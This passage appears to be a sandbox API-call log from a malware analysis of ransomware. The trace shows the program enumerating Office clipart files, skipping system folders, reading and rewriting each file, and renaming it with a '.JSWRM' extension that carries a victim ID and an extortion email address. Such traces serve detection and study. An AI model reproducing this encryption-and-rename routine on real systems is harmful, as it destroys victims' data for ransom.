lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0080.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0080.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0080.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0080.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.216] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101857.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101857.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101857.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101857.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0080.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0080.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0080.217] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5dee50, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe5dee50, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe5dee50, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0101858.BMP", cAlternateFileName="")) returned 1 [0080.217] lstrcmpiW (lpString1="J0101858.BMP", lpString2=".") returned 1 [0080.217] lstrcmpiW (lpString1="J0101858.BMP", lpString2="..") returned 1 [0080.217] lstrcmpiW (lpString1="J0101858.BMP", lpString2="...") returned 1 [0080.217] lstrcmpiW (lpString1="J0101858.BMP", lpString2="windows") returned -1 [0080.217] lstrcmpiW (lpString1="J0101858.BMP", lpString2="recovery") returned -1 [0080.217] lstrcmpiW (lpString1="J0101858.BMP", lpString2="perflogs") returned -1 [0080.217] lstrcmpiW (lpString1="J0101858.BMP", lpString2="documents and settings") returned 1 [0080.217] lstrcmpiW (lpString1="J0101858.BMP", lpString2="$RECYCLE.BIN") returned 1 [0080.217] lstrcmpiW (lpString1="J0101858.BMP", lpString2="system volume information") returned -1 [0080.217] lstrcmpiW (lpString1="J0101858.BMP", lpString2="msocache") returned -1 [0080.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0080.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101858.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101858.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101858.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0080.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0080.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101858.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101858.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101858.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0080.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0080.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0080.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0080.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101858.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101858.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.218] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32184) returned 1 [0080.218] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7db0) returned 0x24d210 [0080.219] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7db0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7db0, lpOverlapped=0x0) returned 1 [0080.265] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.265] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7db0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7db0, lpOverlapped=0x0) returned 1 [0080.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.266] CloseHandle (hObject=0x314) returned 1 [0080.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0080.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0080.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0080.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0080.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0080.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0080.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0080.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0080.267] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101858.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101858.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101858.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101858.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0080.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0080.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0080.268] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5dee50, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe5dee50, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe5dee50, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0101859.BMP", cAlternateFileName="")) returned 1 [0080.268] lstrcmpiW (lpString1="J0101859.BMP", lpString2=".") returned 1 [0080.268] lstrcmpiW (lpString1="J0101859.BMP", lpString2="..") returned 1 [0080.268] lstrcmpiW (lpString1="J0101859.BMP", lpString2="...") returned 1 [0080.268] lstrcmpiW (lpString1="J0101859.BMP", lpString2="windows") returned -1 [0080.268] lstrcmpiW (lpString1="J0101859.BMP", lpString2="recovery") returned -1 [0080.268] lstrcmpiW (lpString1="J0101859.BMP", lpString2="perflogs") returned -1 [0080.268] lstrcmpiW (lpString1="J0101859.BMP", lpString2="documents and settings") returned 1 [0080.268] lstrcmpiW (lpString1="J0101859.BMP", lpString2="$RECYCLE.BIN") returned 1 [0080.268] lstrcmpiW (lpString1="J0101859.BMP", lpString2="system volume information") returned -1 [0080.268] lstrcmpiW (lpString1="J0101859.BMP", lpString2="msocache") returned -1 [0080.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0080.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101859.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101859.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101859.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0080.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0080.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101859.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101859.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101859.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0080.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0080.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0080.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0080.269] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101859.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101859.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.269] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31968) returned 1 [0080.269] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7ce0) returned 0x24d210 [0080.270] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7ce0, lpOverlapped=0x0) returned 1 [0080.274] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.274] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7ce0, lpOverlapped=0x0) returned 1 [0080.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.275] CloseHandle (hObject=0x314) returned 1 [0080.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0080.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0080.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0080.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0080.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0080.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0080.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0080.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0080.275] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101859.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101859.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101859.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101859.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0080.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0080.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0080.276] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe59294b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe59294b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe59294b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0101860.BMP", cAlternateFileName="")) returned 1 [0080.276] lstrcmpiW (lpString1="J0101860.BMP", lpString2=".") returned 1 [0080.276] lstrcmpiW (lpString1="J0101860.BMP", lpString2="..") returned 1 [0080.276] lstrcmpiW (lpString1="J0101860.BMP", lpString2="...") returned 1 [0080.276] lstrcmpiW (lpString1="J0101860.BMP", lpString2="windows") returned -1 [0080.276] lstrcmpiW (lpString1="J0101860.BMP", lpString2="recovery") returned -1 [0080.276] lstrcmpiW (lpString1="J0101860.BMP", lpString2="perflogs") returned -1 [0080.276] lstrcmpiW (lpString1="J0101860.BMP", lpString2="documents and settings") returned 1 [0080.276] lstrcmpiW (lpString1="J0101860.BMP", lpString2="$RECYCLE.BIN") returned 1 [0080.276] lstrcmpiW (lpString1="J0101860.BMP", lpString2="system volume information") returned -1 [0080.276] lstrcmpiW (lpString1="J0101860.BMP", lpString2="msocache") returned -1 [0080.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0080.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101860.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101860.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101860.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0080.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0080.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101860.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101860.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101860.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0080.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0080.277] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0080.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.277] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0080.277] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101860.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101860.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.279] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32184) returned 1 [0080.279] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7db0) returned 0x24d210 [0080.280] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7db0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7db0, lpOverlapped=0x0) returned 1 [0080.320] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.320] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7db0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7db0, lpOverlapped=0x0) returned 1 [0080.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.321] CloseHandle (hObject=0x314) returned 1 [0080.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0080.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0080.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0080.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0080.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0080.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0080.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.322] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101860.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101860.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101860.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101860.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0080.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0080.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0080.323] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5dee50, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe5dee50, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe5dee50, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0101861.BMP", cAlternateFileName="")) returned 1 [0080.323] lstrcmpiW (lpString1="J0101861.BMP", lpString2=".") returned 1 [0080.323] lstrcmpiW (lpString1="J0101861.BMP", lpString2="..") returned 1 [0080.323] lstrcmpiW (lpString1="J0101861.BMP", lpString2="...") returned 1 [0080.323] 